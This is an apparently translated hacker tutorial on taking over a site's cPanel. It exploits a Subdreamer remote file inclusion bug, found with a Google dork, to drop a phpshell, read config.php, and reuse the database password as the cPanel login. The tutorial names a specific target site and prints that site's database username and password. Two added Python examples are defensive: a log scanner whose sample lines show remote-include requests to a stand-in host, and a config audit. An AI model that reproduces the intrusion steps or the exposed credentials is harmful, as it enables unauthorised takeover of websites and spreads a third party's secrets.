CPANEL WITH C99

Hacking Cpanel With C99
=================================================================

What is cPanel? cPanel (Control Panel) is the management center of a web site: it is where the web admin configures and controls everything about the site being built. Think of it as a house that is still empty; later it is filled with furniture to complete the home. cPanel is the same, and the furniture corresponds to web scripts, mail scripts, MySQL scripts, and so on.

Is cPanel really that important and valuable? Good question, and the answer is YES: if a site's cPanel is penetrated by a hacker, the target site is certainly under the hacker's control [sorry, I'm not a hacker :)]. By the same house analogy, if someone manages to take over our house, that person can walk in at any time. But other people cannot easily get into our house as long as it has a safeguard, namely the KEY. cPanel is the same: getting in is not as easy as we imagine, because the entry requires the cPanel username and password, and without them you cannot log in to cPanel. That logic should be clear enough, so back to the subject: the author will explain how a target site's cPanel is taken over by exploiting logic errors in the programming and script mistakes made by the web admin. :)

Let's start. I'll use a bug in a PHP script called 'subdreamer' [see www.subdreamer.com]. The bug is at /skins/advanced/advanced2.php?pluginpath[0]= and the problem file is advanced2.php. We look for a target with uncle google.com using the syntax: inurl:'skins/advanced/advanced1.php?'. As the example, the author takes an overseas site [which had already been told about the bug by mail beforehand, in keeping with hacker ethics] :), namely: http://www.cafesjakie.nl
We try to penetrate the target site using a phpshell, and the result appears as below:
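Added example (not from the original post): seen from the server side, and assuming the include parameter is handed a remote URL, the request described above leaves a recognisable trace in the access log. This Python function scans Apache combined-format lines for any .php request whose parameter value starts with a remote scheme; the log lines, IP addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:10:01:02 +0000] "GET /skins/advanced/advanced2.php?pluginpath[0]=http://files.example.invalid/x.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.4 - - [12/Mar/2008:10:02:10 +0000] "GET /index.php?categoryid=3 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2008:10:03:44 +0000] "GET /skins/advanced/advanced2.php?pluginpath%5B0%5D=ftp%3A%2F%2Ffiles.example.invalid%2Fx HTTP/1.1" 200 4090 "-" "Mozilla/4.0"
198.51.100.9 - - [12/Mar/2008:10:05:00 +0000] "GET /redirect.php?next=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client, request target and status code of one log line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# A parameter value that is itself a remote URL
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftps?)://', re.I)


def find_remote_include_attempts(log_text):
    """Return one record per URL-valued parameter sent to a .php script."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes names and values, so encoded URLs match too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_SCHEME_RE.match(value.strip()):
                hits.append({"client": client, "path": parts.path,
                             "param": name, "status": int(status)})
    return hits


if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG):
        print(hit)
```

Legitimate parameters that carry URLs will also be reported, so treat the output as a review list and pay most attention to hits answered with status 200.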


OK, we managed to get in through the back [backdoor], but we do not yet have the main access [cPanel]; we can only come in through the back door. So we try to find where the main access [cPanel] is. Look at the existing files one by one. In the phpshell output above we can see that the target has safe-mode: OFF, and there we can see uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) with user: gbremmer. That is a good start for finding cPanel access on the target site [if you do not understand uid, gid and groups, study an open-source OS such as Linux; I love Linux]. Note also that the file is in /home/gremmer/public_html/skins/advanced. To gain cPanel access, we go to the main web directory of the target: click the public_html folder (for web admins, public_html = www), which gives the result below:

Look carefully at these folders. Logically, connecting to the database requires a username and password, and both usually live in a file such as config.php, configuration.php or koneksi.php [depending on the script's author]. We click the includes folder [in the subdreamer script, the default location of config.php is the includes folder], which gives the result:

Notice that there are two files, config.php and config.php.new. We can view both of them; the only difference is their size in bytes [config.php.new is probably just an update]. Click config.php to get the result:

Look again: in the config.php file we can see the complete database user along with its password. We will not go into the database here, because we are trying to get the main cPanel access of the target site. Look carefully at $dbname = gbremmer_subdreamer and $dbusername = gbremmer_subdrea: logically, gbremmer is the name of the user and the part behind it is the hosting's default naming. Note also $dbpassword = hiervomgb, which is the password that user uses to log in to the target site's database. Stop. The question is: can we get into the target's cPanel? Good question. Here the author asks you to think logically: do you ever feel safe doing things in the virtual world [the internet]? To the layman this is probably a stupid question; most people assume the internet world is safe and comfortable [nearly 80% say so, which is why they use only one password for many purposes] :). Thinking that way is exactly where our own fault lies [never wanting to know about security on the internet]. So, back to the root of the problem: we think the opposite way from most laymen and try user name: gbremmer and password: hiervomgb to gain the target's main cPanel access.
Let's open the URL: http://www.cafesjakie.nl/cpanel and see that the cPanel page is protected by a user name and password.

Confused, right? :) We try entering the username and password that we got from the config.php file.

There, look: we can enter the target's cPanel and have full admin control over it, using nothing but logic and without much effort :), by exploiting logic errors in the programming and script mistakes made by the admin [though the writer is also one of the web admins at www.sekuritionline.net].
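Added example (not from the original post or from Subdreamer): the walkthrough works because a process running as nobody could read includes/config.php, a second copy (config.php.new) sat beside it, and the database user name carried the account name as a prefix. This Python audit walks a document root and reports those conditions per file; the account name acct, the sample config values and the issue labels are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# File names the article lists as typical credential holders.
CONFIG_NAMES = ("config.php", "configuration.php", "koneksi.php")
# PHP assignments such as: $dbusername = 'acct_user';
ASSIGN_RE = re.compile(r"""\$(dbname|dbusername|dbpassword)\s*=\s*['"]([^'"]*)['"]""", re.I)
# Constructed sample config (placeholder values, not from the page).
SAMPLE = "<?php\n$dbname = 'acct_app';\n$dbusername = 'acct_app';\n$dbpassword = 'example-only';\n"

def audit_docroot(docroot, account):
    """List credential files under docroot and what each one exposes."""
    findings = []
    for folder, _dirs, files in os.walk(docroot):
        for name in files:
            base = name.lower()
            # Copies such as config.php.new hold the same secrets.
            is_copy = any(base.startswith(c + ".") for c in CONFIG_NAMES)
            if base not in CONFIG_NAMES and not is_copy:
                continue
            path = os.path.join(folder, name)
            issues = ["leftover-copy"] if is_copy else []
            # A process under a different uid (the page's nobody) relies on this bit.
            if os.stat(path).st_mode & stat.S_IROTH:
                issues.append("world-readable")
            with open(path, encoding="utf-8", errors="replace") as fh:
                values = {k.lower(): v for k, v in ASSIGN_RE.findall(fh.read())}
            # An "account_name" style database user discloses the login name.
            if values.get("dbusername", "").startswith(account + "_"):
                issues.append("db-user-reveals-account")
            if values.get("dbpassword"):
                issues.append("contains-db-password")
            findings.append((os.path.relpath(path, docroot), sorted(issues)))
    return sorted(findings)

def demo():
    """Build a constructed docroot in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "includes"))
        for name, mode in (("config.php", 0o644), ("config.php.new", 0o600)):
            path = os.path.join(root, "includes", name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(SAMPLE)
            os.chmod(path, mode)
        return audit_docroot(root, "acct")

if __name__ == "__main__":
    print(demo())
```

Whatever the audit reports, a password stored in such a file should be unique to the database and never double as the control panel password.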

Note: 
- Learning to be a hacker is fun; it is the ethics that are hard. When you successfully get into a target site, try to let the relevant parties know so that they can patch the site [all donations requested via e-gold] :) xixixixiix
 
- Make hacking an art, not a way to destroy [except if cornered] :) just kidding :)
 
- Keep in mind that in cyber matters nothing is guaranteed 100% safe, so remember the SO team motto xixi [Nothing Secure in the world, or: in the world there is nothing safe, in the sky there is heaven] :)
 
- For web admins, take it as a lesson: when you get defaced, you don't have to report it to the authorities [that would only end up costing a lot of money :) :) :)]
 
- For admins: always apply patch updates, automatically or manually, and back up web data regularly :). We should be grateful that web hackers remind us [instead of getting angry and going on TV to say] that a web site that cost over 200 million can be called safe [the author says so too, or the web admins will protest]
Greatz: God, who gives me my life and my death; my beloved Erni [now officially my wife], hope for a speedy recovery, I want to have a baby :); my counterparts in SO te@m, Bastard Crew, adhietslank, thesims, fabricate, Jayoes, a -tech, jantap, babypunk, Lt., k1n9kong, faithful, stove ^ meleduk, kabrut, saleho [rahmad pious], pomponk, blindboy, dave, Sonix, ariee, tommy ^ singers, Orgil, Hilda ^ inside, Rini, and those I could not mention one by one [thanks to all who participated in the summit digaht SO]; all underground people; the Hacker, Cracker and Carder channels on DALnet, mildnet, realunix; thanks for the learning :)
No Greatz: The corruption that made our nation suffer.
The author is not only a happy hacker / hobbyist to world affairs underground :)

